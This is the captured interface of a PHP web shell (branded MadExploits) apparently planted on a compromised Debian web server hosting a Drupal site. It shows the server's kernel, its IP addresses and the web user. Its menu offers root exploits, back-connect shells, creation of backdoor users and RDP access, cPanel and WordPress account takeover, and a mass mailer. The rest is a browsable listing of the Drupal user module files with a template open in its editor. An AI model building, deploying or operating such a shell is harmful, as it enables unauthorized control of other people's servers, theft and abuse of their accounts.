Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.138.105.176
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
user /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
user-picture.tpl.php
595
B
-rw-r--r--
user-profile-category.tpl.php
1001
B
-rw-r--r--
user-profile-item.tpl.php
918
B
-rw-r--r--
user-profile.tpl.php
1.65
KB
-rw-r--r--
user-rtl.css
510
B
-rw-r--r--
user.admin.inc
38.52
KB
-rw-r--r--
user.api.php
14.79
KB
-rw-r--r--
user.css
1.78
KB
-rw-r--r--
user.info
366
B
-rw-r--r--
user.install
28.94
KB
-rw-r--r--
user.js
6.41
KB
-rw-r--r--
user.module
140.39
KB
-rw-r--r--
user.pages.inc
21.56
KB
-rw-r--r--
user.permissions.js
2.66
KB
-rw-r--r--
user.test
101.92
KB
-rw-r--r--
user.tokens.inc
4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user-picture.tpl.php
<?php /** * @file * Default theme implementation to present a picture configured for the * user's account. * * Available variables: * - $user_picture: Image set by the user or the site's default. Will be linked * depending on the viewer's permission to view the user's profile page. * - $account: Array of account information. Potentially unsafe. Be sure to * check_plain() before use. * * @see template_preprocess_user_picture() * * @ingroup themeable */ ?> <?php if ($user_picture): ?> <div class="user-picture"> <?php print $user_picture; ?> </div> <?php endif; ?>
Close